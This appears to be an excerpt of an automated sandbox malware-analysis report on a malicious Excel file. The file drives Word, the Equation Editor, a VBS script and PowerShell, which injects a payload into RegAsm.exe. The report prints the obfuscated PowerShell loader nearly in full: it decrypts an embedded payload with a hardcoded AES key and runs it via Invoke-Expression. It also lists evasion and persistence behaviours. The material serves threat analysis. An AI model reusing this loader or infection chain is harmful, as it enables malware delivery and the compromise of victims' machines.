            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: ~DFE4D87C1F83611F19.TMP.0.dr Initial sample: OLE indicators vbamacros = False
            Source: AWD 490104998518.xls Initial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0066C38C pushad ; ret 8_2_0066C38D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01B721D8 push ebx; iretd 10_2_01B721EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01B71BED push eax; retf 10_2_01B71C01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01B70ABD push ebx; retf 10_2_01B70ACA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00457106 push ecx; ret 12_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0045B11A push esp; ret 12_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0045E54D push esi; ret 12_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00457A28 push eax; ret 12_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434E56 push ecx; ret 12_2_00434E69

            Persistence and Installation Behavior

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRoot
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc.0.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: D09A9DB5.doc.4.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00406EB0 ShellExecuteW,URLDownloadToFileW,12_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: AWD 490104998518.xls Stream path 'MBD001EFDD9/Package' entropy: 7.98076101306 (max. 8.0)
            Source: AWD 490104998518.xls Stream path 'Workbook' entropy: 7.9994313604 (max. 8.0)
            Source: ~DFE4D87C1F83611F19.TMP.0.dr Stream path 'Package' entropy: 7.97685690997 (max. 8.0)
            Source: 90530000.0.dr Stream path 'MBD001EFDD9/Package' entropy: 7.97685690997 (max. 8.0)
            Source: 90530000.0.dr Stream path 'Workbook' entropy: 7.99950304966 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040F7A7 Sleep,ExitProcess,12_2_0040F7A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A748
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 599797
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4165
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 602
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 8516
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1599
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3140 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -599797s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -3000000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400 Thread sleep count: 251 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400 Thread sleep time: -125500s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408 Thread sleep count: 908 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408 Thread sleep time: -2724000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3480 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408 Thread sleep count: 8516 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408 Thread sleep time: -25548000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node graph_12-49192
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004432B5 mov eax, dword ptr fs:[00000030h] 12_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00412077 GetProcessHeap,HeapFree,12_2_00412077
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434B47 SetUnhandledExceptionFilter,12_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00419627 mouse_event,12_2_00419627
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
